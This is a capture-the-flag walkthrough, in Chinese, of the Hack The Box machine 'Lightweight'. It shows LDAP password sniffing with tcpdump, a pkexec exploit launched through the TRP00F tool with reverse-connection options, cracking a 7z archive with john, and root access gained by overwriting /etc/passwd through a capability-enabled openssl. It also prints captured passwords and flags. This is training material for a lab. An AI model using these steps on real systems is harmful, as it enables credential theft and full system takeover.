[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…

2024-09-15 68 0

信息收集

IP Address Opening Ports
10.10.10.119 TCP:22,80,389

$ nmap -p- 10.10.10.119 --min-rate 1000 -sC -sV

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

HTTP

http://10.10.10.119/

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图

http://10.10.10.119/info.php

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图1

  1. 目标环境:前端服务器进行了配置更新,现需要在软件开发生命周期(SDLC)中进行渗透测试。服务器上的实际页面已被虚构内容替换,但所有需要测试的功能都已经集成。

  2. 安全保护:服务器有一些安全措施,比如防止暴力破解。如果尝试暴力破解暴露的服务,可能会被封禁,封禁时间最长可达5分钟。

  3. 行为要求:如果被封禁,是测试者自己的责任。被封禁后,不能重置服务器,以免影响其他测试人员的工作,而是要尝试不同的方法。

  4. 封禁信息:被封禁的IP地址列表可以在特定页面查看,不过在封禁期间可能无法访问该页面。

  5. 登录页面:如果想访问测试环境,需要前往用户页面。

http://10.10.10.119/user.php

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图2

  1. 阅读信息页面:如果用户还没有阅读相关信息页面,建议先去阅读该页面并仔细查看内容。

  2. SSH登录:服务器允许通过SSH登录。当用户第一次访问HTTP页面时,服务器会自动将用户的IP地址(例如 10.10.16.24)作为用户名和密码进行注册。这个过程在一分钟内完成。

  3. 修改密码:建议用户在成功登录服务器后立即更改密码以确保账户安全。

  4. 重置账户:如果用户出于某种原因需要重置账户,可以点击提供的链接。重置过程可能需要一分钟时间,账户会被删除并重新创建,注意,这个操作会删除用户主目录中的所有文件。

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图3

LDAP密码嗅探

[10.10.16.24@lightweight /]$ cat /etc/passwd

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图4

嗅探LDAP服务端口

[10.10.16.24@lightweight /]$ tcpdump -i lo port 389 -w /tmp/capture.cap -v

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图5

maptnh@maptnh:~/Desktop/htb$ scp [email protected]:/tmp/capture.cap /tmp/capture.cap

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图6

ldapuser2的密码以明文形式被捕获

password:8bc8251332abe1d7f105d3e53ad39ac2

[10.10.16.24@lightweight /]$ su ldapuser2

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图7

User.txt

616c83ec01d41ae4e9f50b3a4293907b

TRP00F 自动化权限提升

https://github.com/MartinxMax/trp00f

当用户权限提升至ldapuser2即可权限提升

maptnh@maptnh:~/Desktop/htb/Github/TRP00f$ python3 trp00f.py --lhost 10.10.16.24 --lport 10000 --rhost 10.10.16.24 --rport 10001 --http 1111

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图8

权限提升

ldapuser2 –> ldapuser1

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图9

[ldapuser2@lightweight ~]$ cp backup.7z /tmp

maptnh@maptnh:~/Desktop/htb$ scp [email protected]:/tmp/backup.7z /tmp/backup.7z

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图10

需要密码解压

maptnh@maptnh:/tmp$ 7z2john backup.7z >backup.7z.hash

maptnh@maptnh:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt backup.7z.hash

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图11

password:delete

maptnh@maptnh:/tmp$ cat status.php

maptnh@maptnh:/tmp$ 7z x backup.7z

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图12

username:ldapuser1 password:f3ca9d298a553da117442deeb6fa932d

openssl 权限提升

[ldapuser1@lightweight ~]$ ls -la

[ldapuser1@lightweight ~]$ which openssl tcpdump

[ldapuser1@lightweight ~]$ md5sum /usr/sbin/tcpdump ./tcpdump /usr/bin/openssl ./openssl

说明是同一个文件

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图13

[ldapuser1@lightweight ~]$ getcap /usr/sbin/tcpdump

[ldapuser1@lightweight ~]$ getcap ./openssl

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图14

在Linux系统中,ep 权限标记代表 Effective(有效)和 Permitted(允许)。这两个标志是Linux安全功能(Linux Capabilities)的一部分,它们允许你对二进制文件设置特定的权限,而不必以root用户身份运行该文件。

maptnh@maptnh:/tmp$ openssl passwd -1 -salt maptnh root

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图15

[ldapuser1@lightweight ~]$ ./openssl base64 -in /etc/passwd | base64 -d > /dev/shm/passwd

[ldapuser1@lightweight ~]$ echo 'maptnh:$1$maptnh$EaRHF5oKs2oIYcUsHbWYh0:0:0:/bin:/bin/bash'>/dev/shm/passwd

[ldapuser1@lightweight ~]$ cat /dev/shm/passwd | base64 | ./openssl enc -d -base64 -out /etc/passwd

[ldapuser1@lightweight ~]$ su maptnh

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自…插图16

Root.txt

e31f846f4db812157e6595aa0e0e9c80


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论